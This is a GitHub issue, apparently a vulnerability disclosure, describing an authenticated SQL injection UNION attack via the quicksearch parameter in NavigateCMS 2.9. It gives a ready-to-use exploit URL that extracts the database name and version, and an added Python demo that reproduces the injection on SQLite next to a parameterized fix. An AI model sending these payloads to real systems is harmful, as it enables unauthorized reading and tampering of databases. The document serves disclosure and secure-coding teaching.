
SQL injection UNION attack with quicksearch parameter in NavigateCMS 2.9 #25

Closed
@hydrasky-team

Description


EXPECTED BEHAVIOUR
An authenticated malicious user can take advantage of a SQL injection UNION attack vulnerability with the quicksearch parameter in the URL.

IMPACT
A successful SQL injection attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business.

VULNERABILITY CODE
I found that the quicksearch parameter is not handled in the SQL query's WHERE clause in \lib\packages\comments\comments.php

[screenshot]

And the protect function in \lib\core\core.php does not use ESCAPE to filter special characters

[screenshot]

Then it is used to query in: \lib\core\database.class.php

[screenshot]

STEPS TO REPRODUCE

  1. We change the request in the URL

GET /navigate/navigate/navigate.php?fid=comments&act=json&_search=true&quicksearch=%25")+UNION+ALL+SELECT+DATABASE(),null,null,null,null,null,null,VERSION()%3b--&_search=false&nd=1623493056682&rows=30&page=1&sidx=date_created&sord=desc&filters=

  2. And then we could exploit all the data.

[screenshot]
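The mechanics of the reported request, as an added example that is not part of the original issue and not NavigateCMS code: a quicksearch value spliced into a parenthesised LIKE filter lets the payload close the string and the parenthesis, append a UNION ALL SELECT with the same column count, and comment out the rest, while the bound-parameter form treats the same input as a literal pattern. The comments table, its column names and the sample rows are constructed for this example; the payload is the report's URL-decoded one adapted to SQLite (sqlite_version() stands in for the MySQL DATABASE()/VERSION(), and the quoting matches this example's single-quoted template rather than the double-quoted one the report's %") closes).

```python
"""Added example, not NavigateCMS code: how a quicksearch value that is
interpolated into a LIKE filter lets a UNION query append attacker-chosen
rows, and the bound-parameter form that stops it."""
import sqlite3

# Constructed fixture (column names assumed): eight columns, because the
# reported payload supplies eight SELECT values.
SCHEMA = """
CREATE TABLE comments (
    id INTEGER PRIMARY KEY, website INTEGER, item INTEGER, name TEXT,
    email TEXT, message TEXT, status INTEGER, date_created INTEGER
);
INSERT INTO comments VALUES
    (1, 1, 10, 'alice', 'alice@example.test', 'Nice article', 1, 1623400000),
    (2, 1, 11, 'bob', 'bob@example.test', 'Thanks for this', 0, 1623410000);
"""
SELECT = ("SELECT id, website, item, name, email, message, status, date_created "
          "FROM comments ")

# The report's URL-decoded payload, adapted to SQLite: DATABASE() and
# VERSION() are MySQL functions, so sqlite_version() stands in, and the
# quotes match this example's single-quoted template (the report closes a
# double-quoted one with %"). The trailing "-- " comments out the rest of
# the original WHERE clause.
PAYLOAD = ("%') UNION ALL SELECT sqlite_version(),NULL,NULL,NULL,NULL,NULL,NULL,"
           "'injected'-- ")


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def run_vulnerable(quicksearch):
    """The unsafe pattern: the raw parameter is spliced into the WHERE clause."""
    sql = SELECT + "WHERE (message LIKE '%" + quicksearch + "%')"
    return open_db().execute(sql).fetchall()


def run_safe(quicksearch):
    """Bind the value instead of splicing it, and escape LIKE wildcards with an
    ESCAPE clause so '%' and '_' typed by the user match literally."""
    escaped = (quicksearch.replace("\\", "\\\\")
               .replace("%", "\\%")
               .replace("_", "\\_"))
    sql = SELECT + "WHERE (message LIKE ? ESCAPE '\\')"
    return open_db().execute(sql, ("%" + escaped + "%",)).fetchall()


def injected_rows(rows):
    """Rows that came from the appended SELECT rather than the comments table."""
    return [r for r in rows if r[7] == "injected"]


if __name__ == "__main__":
    print("vulnerable, benign input:", run_vulnerable("Nice"))
    print("vulnerable, payload:", run_vulnerable(PAYLOAD))
    print("safe, payload:", run_safe(PAYLOAD))
```

With the vulnerable builder the payload returns every comment plus one extra row carrying the database version, which is the behaviour the screenshot in the report shows for DATABASE() and VERSION(); with the bound parameter the same input matches nothing, and a bare "%" no longer acts as a wildcard either.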
